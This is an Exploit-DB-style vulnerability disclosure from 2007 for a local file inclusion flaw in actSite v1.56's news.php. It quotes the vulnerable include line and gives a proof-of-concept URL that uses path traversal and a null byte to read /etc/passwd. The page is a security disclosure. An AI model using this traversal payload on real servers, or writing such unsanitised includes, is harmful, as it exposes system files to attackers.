actSite v1.56 (news.php) Local File Inclusion

vendor:

actSite

by:

DNX

7.5

CVSS

HIGH

Local File Inclusion

CWE

Product Name: actSite

Affected Version From: v1.56

Affected Version To: v1.56

Patch Exists: YES

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested:

2007

actSite v1.56 (news.php) Local File Inclusion

The actSite v1.56 (news.php) is vulnerable to Local File Inclusion. The vulnerability allows an attacker to include local files from the server by manipulating a POST parameter in the news.php file. By using a specially crafted request, an attacker can include arbitrary files and potentially read sensitive information from the server.

Mitigation:

Install security update to v1.57

Source

Exploit-DB raw data:

                         \#'#/

                         (-.-)

   -----------------oOO---(_)---OOo-----------------

   | actSite v1.56 (news.php) Local File Inclusion |

   |                 coded by DNX                  |

   -------------------------------------------------

[!] Discovered: DNX

[!] Vendor: http://www.actsite.de

[!] Detected: 02.09.2007

[!] Reported: 02.09.2007

[!] Remote: yes



[!] Background: actSite is a content management system based on PHP and MySQL



[!] Bug: in phpinc/news.php line 101



         require PHP_INCLUDE_PATH."/inc/news/news_$_POST[do].php";



[!] PoC: 

    - http://[site]/[path]/phpinc/news.php?do=/../../../../../../../etc/passwd%00



[!] Description:

    - So why we can inject code in a post variable per url? Let's do some research...

      - In phpinc/news.php line 36

      	require_once('../config.php');



      - Let's take a look in 'config.php' line 22

        if(empty($BaseCfg['install_run'])) require_once($BaseCfg['BaseDir']."/phpinc/inc/csb.php");



      - Ok, let's take a look in 'phpinc/inc/csb.php' line 18

        if(getenv('REQUEST_METHOD') == "GET") {

		foreach($_GET as $key => $val) {

			 $_POST[$key] =& $_GET[$key];

		}

	}



[!] Solution: Install security update to v1.57

# milw0rm.com [2007-10-01]